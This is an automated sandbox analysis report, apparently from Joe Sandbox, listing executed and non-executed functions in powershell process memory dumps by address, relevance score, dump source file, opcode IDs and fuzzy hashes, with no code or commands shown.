                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3059386188.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ffd9b880000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b9d03455a7da56e9e75e475eee8c6b40de6e90b369d87362e1447fd6733cd010
                                                                                                  • Instruction ID: 451afb5ce48ef46bccca85ce8a46e09532160b32f777f7837aff31c83e9b1939
                                                                                                  • Opcode Fuzzy Hash: b9d03455a7da56e9e75e475eee8c6b40de6e90b369d87362e1447fd6733cd010
                                                                                                  • Instruction Fuzzy Hash: 1E116024F1D9994FE395E768882037877A2EF8A705F5140B9D46DC72EBCD285D408352
                                                                                                  Function 00007FFD9B887ABF Relevance: .1, Instructions: 60COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3059386188.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ffd9b880000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4ff7234d81448e201b24800916d9645c8e5d1ce6c9e48953eb32bdc1cd4bb41c
                                                                                                  • Instruction ID: eea69db750f9e374c9fc384d8649d56fb72a1652c42b8da073085ba8ed88059e
                                                                                                  • Opcode Fuzzy Hash: 4ff7234d81448e201b24800916d9645c8e5d1ce6c9e48953eb32bdc1cd4bb41c
                                                                                                  • Instruction Fuzzy Hash: 42110835F2DD854BE329EB78882027837A6EB8E711F1641B9D03EC32D7DD389D418281
                                                                                                  Function 00007FFD9B885725 Relevance: .0, Instructions: 49COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3059386188.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ffd9b880000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ce6572711bb6b6bc624d8f8be116ddbdc21a7a22be1080e894dbeec2797293b1
                                                                                                  • Instruction ID: f8d4e515f134cbb36ad41106313c836777da2fca4044d539aab7958e3ab50b95
                                                                                                  • Opcode Fuzzy Hash: ce6572711bb6b6bc624d8f8be116ddbdc21a7a22be1080e894dbeec2797293b1
                                                                                                  • Instruction Fuzzy Hash: 5701A73020CB0C8FD748EF0CE451AA6B7E0FF89324F10056DE58AC36A1D632E881CB41
                                                                                                  Function 00007FFD9B88930D Relevance: .0, Instructions: 48COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3059386188.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ffd9b880000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 23226088f8bb9d176349aaec98c52d0f1f9ee9f67930bef6b92e543328a85322
                                                                                                  • Instruction ID: 23cc86b7c9ddd85160f58845fb72f0fe9f4312ef5274695e0dd90477ad30188d
                                                                                                  • Opcode Fuzzy Hash: 23226088f8bb9d176349aaec98c52d0f1f9ee9f67930bef6b92e543328a85322
                                                                                                  • Instruction Fuzzy Hash: C601D120B1DE5A0FE31AE72C84756B83393DB9E300B1141FAD41EC72EBDD28AD468381
                                                                                                  Function 00007FFD9B8884E9 Relevance: .0, Instructions: 39COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3059386188.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ffd9b880000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 49df87bc3b065fbfd376a073106870dd6ff6137fa384a0f8b08eadd448919729
                                                                                                  • Instruction ID: c7aaaa50dcea48592e66fef290492383df11e42f049cc0b5483d973b4fdde5a7
                                                                                                  • Opcode Fuzzy Hash: 49df87bc3b065fbfd376a073106870dd6ff6137fa384a0f8b08eadd448919729
                                                                                                  • Instruction Fuzzy Hash: 2BF06220B2DB894FE39AA768482123537A2DB4A700F1000FED41DC73E7CC259C818352
                                                                                                  Function 00007FFD9B888568 Relevance: .0, Instructions: 36COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3059386188.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ffd9b880000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 30fe7f129da0942f1c5c17de3a33d7f32f211f163c438e28e562b4a9d1475494
                                                                                                  • Instruction ID: b2a7c2b0ded068c9182556a2e095a57e2b5f8753488fb6fca57973198e819c70
                                                                                                  • Opcode Fuzzy Hash: 30fe7f129da0942f1c5c17de3a33d7f32f211f163c438e28e562b4a9d1475494
                                                                                                  • Instruction Fuzzy Hash: 93F0302071DA890FE399A76848647393BA2EB8A704F1141BED56EC72E7DD649C454312
                                                                                                  Function 00007FFD9B887D5E Relevance: .0, Instructions: 35COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3059386188.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ffd9b880000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7b6b721c4a1909b831cb36bee65ce65b147151efdfc28235894dbfb2c5f9d298
                                                                                                  • Instruction ID: 346da973404aec857743ec4ed2165011a234f2470b2ceea34d16384cfbf8f684
                                                                                                  • Opcode Fuzzy Hash: 7b6b721c4a1909b831cb36bee65ce65b147151efdfc28235894dbfb2c5f9d298
                                                                                                  • Instruction Fuzzy Hash: 99F04F20B1DA994FE3AAD77884247782BB2AF4A345F4501FAD05DCB2EBCE285D408351
                                                                                                  Function 00007FFD9B95364A Relevance: .0, Instructions: 34COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3061137897.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ffd9b950000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e6bedabed42e8c55157274042c13587d3f524876a464eb874cbbdae8216394d0
                                                                                                  • Instruction ID: 1d9bf36b5ecab952c05470e31a0e8d784234522ca4107ead587ed2d14625fa79
                                                                                                  • Opcode Fuzzy Hash: e6bedabed42e8c55157274042c13587d3f524876a464eb874cbbdae8216394d0
                                                                                                  • Instruction Fuzzy Hash: 49E09B12F5F92D0EE7B5E1DC342A6F853C1DF9861178501B7DC1EC32A6ED04DD110281
                                                                                                  Function 00007FFD9B8882B0 Relevance: .0, Instructions: 31COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3059386188.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ffd9b880000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5a82c798a63f3bf0dd877ca552c13f84d098c441334fafc9a1e4bdc3aecd6cf6
                                                                                                  • Instruction ID: 3b0a63f7fef9855e9f36d32345d9adfe85992d5f9e5345cbaf2db51520ff849f
                                                                                                  • Opcode Fuzzy Hash: 5a82c798a63f3bf0dd877ca552c13f84d098c441334fafc9a1e4bdc3aecd6cf6
                                                                                                  • Instruction Fuzzy Hash: DAF0F834A1DA894FE39AD76884616653BA2EB8A300F6540FAD05DCB2E7CD3898818351
                                                                                                  Function 00007FFD9B8881D3 Relevance: .0, Instructions: 24COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3059386188.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ffd9b880000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: dfd3e17cf7ca21a7feaad2832ee11075258f41eb8209692d75833de2aa40ad88
                                                                                                  • Instruction ID: 113f51b970a867fd3e9c4416c7137e7e1cac1524973213c2aa113e0b5362486a
                                                                                                  • Opcode Fuzzy Hash: dfd3e17cf7ca21a7feaad2832ee11075258f41eb8209692d75833de2aa40ad88
                                                                                                  • Instruction Fuzzy Hash: 32E08031B1D9098FD729DB5CD4502BD7352E789311F118279D01DC72D7DE3999428784
                                                                                                  Function 00007FFD9B887CB5 Relevance: .0, Instructions: 18COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3059386188.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ffd9b880000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: de5b0d826e0a533eef99329b053df7aaf1a91fa0527d5ec5bf81ed4a0ca49ede
                                                                                                  • Instruction ID: f9355430255a6896b835de1e3ce26c0749b1b75c655e934e3d16110c3243bec1
                                                                                                  • Opcode Fuzzy Hash: de5b0d826e0a533eef99329b053df7aaf1a91fa0527d5ec5bf81ed4a0ca49ede
                                                                                                  • Instruction Fuzzy Hash: E8D05B15F1D9C95BE359D774442033537A79B8A311F1541B9D07EC72D2CD240D418212
                                                                                                  Function 00007FFD9B888549 Relevance: .0, Instructions: 11COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.3059386188.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ffd9b880000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 781ada4a0848b7275b8608ce5aed192727783e19fa73094fdc62f03d6d0e08f3
                                                                                                  • Instruction ID: 86789feb71bb5086222d09250dcfb0a0645474014afb99075cb53bf86a81e77c
                                                                                                  • Opcode Fuzzy Hash: 781ada4a0848b7275b8608ce5aed192727783e19fa73094fdc62f03d6d0e08f3
                                                                                                  • Instruction Fuzzy Hash: 69C04C10F1C91A4BE3197658BD2667C7191AB58305F20407AF62DC72DBED286C52464B

                                                                                                  Executed Functions

                                                                                                  Function 00007FFD9B79ED40 Relevance: 1.4, Strings: 1, Instructions: 125COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2732974153.00007FFD9B79D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B79D000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_7ffd9b79d000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: *V]
                                                                                                  • API String ID: 0-1765410883
                                                                                                  • Opcode ID: 4d44ead174f3743ef80400ca25ba98739f6aae077673cc86e2a24785515c362d
                                                                                                  • Instruction ID: 6292b7e9a3590a546edbd0a01f77368dc5b03e29420475b7ac6286fd79827fe4
                                                                                                  • Opcode Fuzzy Hash: 4d44ead174f3743ef80400ca25ba98739f6aae077673cc86e2a24785515c362d
                                                                                                  • Instruction Fuzzy Hash: C041193140EBC44FE7569B2898519523FF0EF57220B1A06DFD088CB1B3D629A84AC792
                                                                                                  Function 00007FFD9B98660A Relevance: .5, Instructions: 463COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2757163747.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_7ffd9b980000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 48733a1530a038240021cf28d020a253789a1a60953e8435daf1efc9ddde02f9
                                                                                                  • Instruction ID: b451fbab755a76c095f19dc21500bd263c58cb10dd7c19b5e95fbd73eefa1317
                                                                                                  • Opcode Fuzzy Hash: 48733a1530a038240021cf28d020a253789a1a60953e8435daf1efc9ddde02f9
                                                                                                  • Instruction Fuzzy Hash: 90D17732B1EE8D1FEBA59BA858659B57BE1EF56310B0900FED45CCB0E3D928AD01C341
                                                                                                  Function 00007FFD9B8B9818 Relevance: .1, Instructions: 146COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2747411790.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_7ffd9b8b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 928371046e5c5e0887cf86a99e6c6a7c6db0a412f6ec096b460e70ecfb5782a3
                                                                                                  • Instruction ID: 46518c63b4f6befc7408d644176bef88ab96addec333b7fcf75fdec7a7e9cfba
                                                                                                  • Opcode Fuzzy Hash: 928371046e5c5e0887cf86a99e6c6a7c6db0a412f6ec096b460e70ecfb5782a3
                                                                                                  • Instruction Fuzzy Hash: 1B411B7191DA884FDB599B6C9C1A6B87BE0FB59310F04417FE459C3297DA30A905CBC2
                                                                                                  Function 00007FFD9B8BA2C1 Relevance: .1, Instructions: 100COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2747411790.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_7ffd9b8b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 80253d4f41245a86c04434fbd5c593ba65c7f249b244014ce12ccaf4ac4ab82f
                                                                                                  • Instruction ID: bd446e600eb4f1ae09f0a6e056040d094a9bb4aae158b9af2aaa1b567b474083
                                                                                                  • Opcode Fuzzy Hash: 80253d4f41245a86c04434fbd5c593ba65c7f249b244014ce12ccaf4ac4ab82f
                                                                                                  • Instruction Fuzzy Hash: 9431F63190D78C4FCB59DF5888496E93FF0EF66321F0441AFC048C7162D634980ACB51
                                                                                                  Function 00007FFD9B8BA1A8 Relevance: .1, Instructions: 69COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2747411790.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_7ffd9b8b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4b1457db804ee2d49e49c858d969c6c8efde2bb07d4f57b8d2a7a60a7c0786fd
                                                                                                  • Instruction ID: f4812e08113affe7637248cf53e4a041996e622f03108f5bf119d62371c3c73b
                                                                                                  • Opcode Fuzzy Hash: 4b1457db804ee2d49e49c858d969c6c8efde2bb07d4f57b8d2a7a60a7c0786fd
                                                                                                  • Instruction Fuzzy Hash: 7C21FCB690E9DD5FE7A2DB68487A0D07FB0EF2520470A01E7D4D98B0B3FD2116058BD2
                                                                                                  Function 00007FFD9B8B33B5 Relevance: .0, Instructions: 49COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2747411790.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_7ffd9b8b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                  • Instruction ID: 9bdfda7ff094c016ee29611a0f36b44afefaafe4c9d5040173e090ca4ad0f1af
                                                                                                  • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                  • Instruction Fuzzy Hash: 8701A73120CB0C4FD748EF0CE451AA6B3E0FB89320F10056EE58AC36A1DA32E882CB41
                                                                                                  Function 00007FFD9B98414D Relevance: .0, Instructions: 37COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2757163747.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_7ffd9b980000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9e46850aaa48fa154aef65c03c46679ea6cef6ebcb7f57dd517233b3b6b11b00
                                                                                                  • Instruction ID: 33db15b90b40db0e45143d90ffee0a8f84974b6438128fee394d780f2c28e1c3
                                                                                                  • Opcode Fuzzy Hash: 9e46850aaa48fa154aef65c03c46679ea6cef6ebcb7f57dd517233b3b6b11b00
                                                                                                  • Instruction Fuzzy Hash: 7DF0BE32B0E9098FD769EA5CE4519A873E0EF6532071640BAE06DC72B3CA35EC40C741
                                                                                                  Function 00007FFD9B984400 Relevance: .0, Instructions: 35COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2757163747.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_7ffd9b980000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9535c0705e01a1791822186ba75172f3741979fff69f67ac49c4f26d4adaa46a
                                                                                                  • Instruction ID: d2cbe8f68cf28a6c7f4c4d171e7b35171f0946e3d27610662a94ff0eccaa6bb5
                                                                                                  • Opcode Fuzzy Hash: 9535c0705e01a1791822186ba75172f3741979fff69f67ac49c4f26d4adaa46a
                                                                                                  • Instruction Fuzzy Hash: 5EF05E32B0E9498FD764EA6CE4619A877E0EF45324B5600BAE15DCB5B3DA25EC40C750
                                                                                                  Function 00007FFD9B9841D1 Relevance: .0, Instructions: 29COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2757163747.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_7ffd9b980000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                  • Instruction ID: f848ec0fbad17b8826867ba541709e28433eada1e34e052a78df0744753283af
                                                                                                  • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                  • Instruction Fuzzy Hash: F1E01A31B1C8089FDAB9DA4CE051AA973E1EFA832171241BBD14EC7671CA32ED518B80

                                                                                                  Non-executed Functions

                                                                                                  Function 00007FFD9B9830E9 Relevance: .7, Instructions: 665COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2757163747.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_7ffd9b980000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 25d464bf6eba54bca6b57a828bf122b8fc6d06c5d5df52e9eaf0b4159887095a
                                                                                                  • Instruction ID: cc7438239aeed81b4a3f745dfe53b0905a8309c34e4586cf00efb2a9894ebcdf
                                                                                                  • Opcode Fuzzy Hash: 25d464bf6eba54bca6b57a828bf122b8fc6d06c5d5df52e9eaf0b4159887095a
                                                                                                  • Instruction Fuzzy Hash: F6125922B1EF891FE7A6967C18655B07BD1EF56320B0A01FBE44DC71E3ED28AD068341
                                                                                                  Function 00007FFD9B8B8BFA Relevance: 7.6, Strings: 6, Instructions: 93COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2747411790.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_7ffd9b8b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: K_^=$K_^@$K_^T$K_^U$K_^W$K_^Y
                                                                                                  • API String ID: 0-440027145
                                                                                                  • Opcode ID: 638847042ed264e51ec6e8f79c143a00ca79f76891a33b1b8ae124c8973620fc
                                                                                                  • Instruction ID: bef7f5e7c9eb37228c4961a1aec11fa5ebc933a4ce67db27d938aee13b6cadd2
                                                                                                  • Opcode Fuzzy Hash: 638847042ed264e51ec6e8f79c143a00ca79f76891a33b1b8ae124c8973620fc
                                                                                                  • Instruction Fuzzy Hash: 782187B3718529AEDB0A36ADBC556D83B90DF9137534502F3C269DF143EC54B48789C0
                                                                                                  Function 00007FFD9B8B85FA Relevance: 6.4, Strings: 5, Instructions: 120COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2747411790.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_7ffd9b8b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: K_^$K_^$K_^$K_^$K_^
                                                                                                  • API String ID: 0-3188868157
                                                                                                  • Opcode ID: 3b7a0dc21be2496159ecafc0c6ec8108ec0da24afa51339f1276247e9d32396f
                                                                                                  • Instruction ID: 10b15779f2644237ddb1d477c388134d395bbb120bb67b284098710b76452d96
                                                                                                  • Opcode Fuzzy Hash: 3b7a0dc21be2496159ecafc0c6ec8108ec0da24afa51339f1276247e9d32396f
                                                                                                  • Instruction Fuzzy Hash: 0631B4A7A0FAE65EEA260779886D4D52FA0EF1725470A02F6D0E8470A3FD0435075A91
                                                                                                  Function 00007FFD9B8B86D3 Relevance: 5.1, Strings: 4, Instructions: 142COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2747411790.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_7ffd9b8b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: K_^$K_^$K_^$K_^
                                                                                                  • API String ID: 0-4267328068
                                                                                                  • Opcode ID: bc67644f73fb34e04c47f77b628c7641babb68dff4e144c0f347569cdcac64f0
                                                                                                  • Instruction ID: 6c090fed82a509d37a36e288decb5babfb14e79fc3b715696f3feb909fdfb90c
                                                                                                  • Opcode Fuzzy Hash: bc67644f73fb34e04c47f77b628c7641babb68dff4e144c0f347569cdcac64f0
                                                                                                  • Instruction Fuzzy Hash: 7A41B7A3A0E6DA4FE7664B7858790E43FA0EF1625874B01F7D4E48F1B3ED0429079791
                                                                                                  Function 00007FFD9B8B851B Relevance: 5.1, Strings: 4, Instructions: 58COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2747411790.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_7ffd9b8b0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: K_^$K_^$K_^$K_^
                                                                                                  • API String ID: 0-4267328068
                                                                                                  • Opcode ID: f0f58d93f29fdb0809d7f212d14dcf6297fba00c428ceab4e74f7e3bcd0a640c
                                                                                                  • Instruction ID: cd0e986a0a46ccc6872b5abd238487c97a96428ab243cf6b00950ca3e6ef9e2d
                                                                                                  • Opcode Fuzzy Hash: f0f58d93f29fdb0809d7f212d14dcf6297fba00c428ceab4e74f7e3bcd0a640c
                                                                                                  • Instruction Fuzzy Hash: FE119EA7F0F9D75BEA62077908795E92F94BF56314B0B01F2D0E84B0A3FD05BA039651

                                                                                                  Executed Functions

                                                                                                  Function 00007FFD9B966605 Relevance: .4, Instructions: 434COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2693957824.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b960000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: db0b5eb89948143b671bf702e648a821694127fa4ae1a750610c03703711c094
                                                                                                  • Instruction ID: cf9b70160f52247e4d227bf6a60b5d944a86d7500bdafbf6fb387fc8c3f0fe19
                                                                                                  • Opcode Fuzzy Hash: db0b5eb89948143b671bf702e648a821694127fa4ae1a750610c03703711c094
                                                                                                  • Instruction Fuzzy Hash: F7D16532B1EACDAFEBA5ABA858645F57BA1EF52314B0900FED45CC70E3D918A901C341
                                                                                                  Function 00007FFD9B89A210 Relevance: .4, Instructions: 377COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000005.00000002.2681862017.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_5_2_7ffd9b890000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 029f425070630eab72a2bb95d807f8fd3c08b1363d2b3c2037c4163ee6485e1f
                                                                                                  • Instruction ID: c95fe37b70dbeb085fcc51b15b35108ab9a873cd02980ea5de92b93bb7bf15ac
                                                                                                  • Opcode Fuzzy Hash: 029f425070630eab72a2bb95d807f8fd3c08b1363d2b3c2037c4163ee6485e1f
                                                                                                  • Instruction Fuzzy Hash: FE01AD7990E7CD5FDB169B6888286943FB0EF27210F0A00EBD488CB0B3D6259948C782
                                                                                                  Function 00007FFD9B899E08 Relevance: .2, Instructions: 225COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
